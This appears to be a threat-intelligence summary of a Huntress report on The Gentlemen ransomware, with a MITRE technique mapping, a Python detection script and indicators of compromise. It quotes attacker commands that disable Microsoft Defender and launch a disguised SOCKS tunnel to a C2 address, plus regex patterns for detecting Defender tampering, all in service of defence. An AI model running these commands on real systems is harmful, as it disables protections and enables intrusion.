The Gentleman Ransomware | Defense Evasion TTPs Uncovered | Huntress

Huntress investigated two incidents involving The Gentlemen ransomware in April and May 2025 that involved Scheduled Tasks, PowerShell, event log clearing, and attempts to disable Microsoft Defender. A leaked internal database also exposed the group’s infrastructure, negotiation details, and security-evasion tradecraft, including links to #TheGentlemen #MicrosoftDefender #Huntress

Key points

  • The Gentlemen is a ransomware-as-a-service operation that has reportedly grown quickly since launching in mid-2025.
  • Huntress analyzed two incidents where The Gentlemen ransomware was deployed, one affecting a shipping and transportation organization and another affecting a construction company.
  • Both incidents involved Scheduled Tasks, PowerShell activity, and clearing of the Security, System, and Application Windows Event Logs.
  • The attackers attempted to disable Microsoft Defender, add antivirus exclusions, and re-run the encryptor after initial blocking.
  • A leaked internal database revealed operator accounts, infrastructure details, initial access interests, and ransom negotiation behavior.
  • The second incident included a malicious Scheduled Task that launched a disguised binary, svchost32.exe, to establish SOCKS proxy connectivity to C2 infrastructure.
  • Defensive recommendations included MFA, restricting RDP, monitoring scheduled tasks, enabling Defender tamper protection, and treating log clearing as an escalation trigger.

MITRE Techniques

  • [T1053.005] Scheduled Task/Job: Scheduled Task – Used to relaunch the encryptor and maintain persistence; the attackers created scheduled tasks that repeatedly triggered malicious execution (‘The threat actor then created a series of Scheduled Tasks… One of these was used to run the file encryptor again.’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Used to execute commands that disabled Microsoft Defender, changed preferences, and added exclusions (‘powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Used to disable Microsoft Defender and reduce protection before redeploying the ransomware (‘disable Microsoft Defender and add antivirus exclusions’).
  • [T1562.002] Impair Defenses: Disable Windows Event Logging – Used to clear the Security, System, and Application logs to hide traces of activity (‘the Security, System, and Application Event Logs were cleared’).
  • [T1070.001] Indicator Removal on Host: Clear Windows Event Logs – Used to erase specific Windows logs during the intrusion (‘Event ID 104… and Event ID 1102… showing that all have been cleared’).
  • [T1021.001] Remote Services: Remote Desktop Protocol – Used to access the environment through a compromised account (‘initiating a Remote Desktop Protocol (RDP) connection using a compromised user’s account’).
  • [T1218.011] System Binary Proxy Execution: Rundll32 – Not directly evidenced. The article describes a disguised system-like binary (a fake svchost) rather than abuse of a legitimate, MITRE-listed Windows binary, so beyond masquerading no standard proxy-execution technique is clearly supported.
  • [T1036] Masquerading – The binary svchost32.exe was disguised as the legitimate Windows process svchost.exe to blend in (‘The binary (svchost32.exe), disguised as the legitimate Windows system process svchost.exe’).
  • [T1090.001] Proxy: Internal Proxy – Used a SOCKS proxy connection from the malicious binary to relay traffic to C2 (‘created a SOCKS proxy connection to a command-and-control (C2) IP address’).
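Detection logic for the evasion techniques listed above, as an added example that is not part of the Huntress write-up: it runs over a few constructed Windows event records (the field names and the use of Security 4688/4698 process and scheduled-task events plus the 1102/104 log-cleared events are assumptions about how the telemetry is shaped) and maps each record to the technique IDs above, flagging a cleared log as the escalation trigger the key points recommend.

```python
import re
from collections import defaultdict

# Constructed sample records shaped like Windows Security/System events; not real telemetry.
SAMPLE_EVENTS = [
    {"channel": "Security", "id": 4688, "host": "WIN-8OA3CCQAE4D",
     "cmdline": "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled"},
    {"channel": "Security", "id": 4698, "host": "WIN-8OA3CCQAE4D",  # scheduled task created
     "cmdline": r"C:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks"},
    {"channel": "Security", "id": 4688, "host": "WIN-8OA3CCQAE4D",  # benign: the real svchost
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"channel": "Security", "id": 1102, "host": "WIN-8OA3CCQAE4D", "cmdline": ""},  # audit log cleared
    {"channel": "System", "id": 104, "host": "WIN-8OA3CCQAE4D", "cmdline": ""},     # System log cleared
]

# T1562.001: Defender weakened via PowerShell cmdlets (Disable* switches, exclusions, WinDefend service).
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+|"
    r"(?:Stop-Service|Set-Service)\b[^;]*\bWinDefend\b", re.I)
# T1070.001: (channel, event ID) pairs written when a log is cleared.
LOG_CLEAR = {("Security", 1102), ("System", 104), ("Application", 104)}
# T1053.005: scheduled-task action launched from a user-writable location (Temp or a profile).
WRITABLE_PATH = re.compile(r"\\(?:temp|users)\\", re.I)
IMAGE = re.compile(r'^"?([^\s"]+\.exe)', re.I)  # image path at the start of a command line

def classify(ev):
    """Return the set of technique IDs a single event evidences."""
    hits = set()
    if (ev["channel"], ev["id"]) in LOG_CLEAR:
        hits.add("T1070.001")
    cmd = ev.get("cmdline", "")
    if DEFENDER_TAMPER.search(cmd):
        hits.add("T1562.001")
    m = IMAGE.match(cmd)
    if m:
        path = m.group(1).lower()
        name = path.rsplit("\\", 1)[-1]
        if name.startswith("svchost") and not path.startswith("c:\\windows\\system32\\"):
            hits.add("T1036")  # svchost-style name running from anywhere but System32
    if ev["id"] == 4698 and WRITABLE_PATH.search(cmd):
        hits.add("T1053.005")
    return hits

def triage(events):
    """Group technique hits per host; a cleared log marks the host for escalation."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= classify(ev)
    return {h: {"techniques": sorted(t), "escalate": "T1070.001" in t} for h, t in per_host.items()}
```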

Indicators of Compromise

  • [IP address] C2 infrastructure used by the malicious scheduled task – 193.233.202[.]17, 77.110.122[.]137
  • [File name] Ransomware payloads and ransom note – win.exe, G_hlm7jj_windows_amd64.exe, README-GENTLEMEN.txt
  • [SHA256 hash] Encryptor sample from the second incident – f918535f974591ef031bd0f30a8171e3da27a6754e6426a8ba095f83195661c8
  • [Host name] Workstation associated with malicious activity – WIN-8OA3CCQAE4D
  • [Detection name] Microsoft Defender detections tied to the activity – Trojan:Win32/MpTamperBulkExcl.H, Ransom:Win64/Gentlemen.SH!MTB, Ransom:Win64/BlackByte.SZ!MTB
  • [Process / command line] Ransomware execution and scheduled task persistence – C:\Users\REDACTED\Documents\win.exe --password REDACTED --T 200 --superfast, C:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks, and 1 more command-line item


Read more: https://www.huntress.com/blog/the-gentlemen-ransomware-defense-evasion-ttps